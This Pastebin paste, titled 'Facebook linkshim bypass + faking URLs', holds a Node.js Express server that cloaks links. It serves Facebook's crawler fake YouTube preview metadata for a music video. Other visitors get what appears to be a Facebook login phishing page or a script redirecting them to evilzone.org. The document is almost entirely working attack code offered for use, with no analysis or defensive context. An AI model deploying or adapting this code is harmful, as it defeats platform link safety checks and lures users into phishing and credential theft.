Guest User

Facebook linkshim bypass + faking URLs

a guest
Oct 30th, 2017
1,983
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. const express = require('express')
  2. const app = express()
  3.  
  4. app.get('/test', function (req, res) {
  5. console.log(req.headers['user-agent']);
  6. if (req.headers['user-agent'].includes('facebook')) {
  7. console.log('Facebook bot detected, returning fake HTML without malicious code');
  8. res.send(`<html><head>
  9. <link href='https://i.ytimg.com/vi/CTFtOOh47oo/maxresdefault.jpg' rel='image_src'/>
  10. <meta content='https://www.youtube.com/watch?v=CTFtOOh47oo' property='og:url'/>
  11. <meta content='French Montana - Unforgettable ft. Swae Lee' property='og:title'/>
  12. <meta content='\"Unforgettable\" ft. Swae Lee Available at iTunes: http://smarturl.it/Unforgettable_fiTunes ...' property='og:description'/>
  13. <meta content='https://i.ytimg.com/vi/CTFtOOh47oo/maxresdefault.jpg' property='og:image'/>
  14. </head>
  15. <br>Hello world</html>`)
  16. }
  17. else {
  18. res.sendFile('/root/barak/node/fblogin.htm')
  19. }
  20. })
  21.  
  22. app.get('/fb', function (req, res) {
  23. console.log(req.headers['user-agent']);
  24. if (req.headers['user-agent'].includes('facebook')) {
  25. console.log('facebook found');
  26. res.send(`<html><head>
  27. <link href='https://i.ytimg.com/vi/CTFtOOh47oo/maxresdefault.jpg' rel='image_src'/>
  28. <meta content='https://www.youtube.com/watch?v=CTFtOOh47oo' property='og:url'/>
  29. <meta content='French Montana - Unforgettable ft. Swae Lee' property='og:title'/>
  30. <meta content='\"Unforgettable\" ft. Swae Lee Available at iTunes: http://smarturl.it/Unforgettable_fiTunes ...' property='og:description'/>
  31. <meta content='https://i.ytimg.com/vi/CTFtOOh47oo/maxresdefault.jpg' property='og:image'/>
  32. </head>
  33. <br>Hello world</html>`)
  34. }
  35. else {
  36. res.send('<script>document.location="http://evilzone.org/"</script>')
  37. }
  38. })
  39.  
  40. app.listen(80, function () {
  41. console.log('listening on port 80!')
  42. })
RAW Paste Data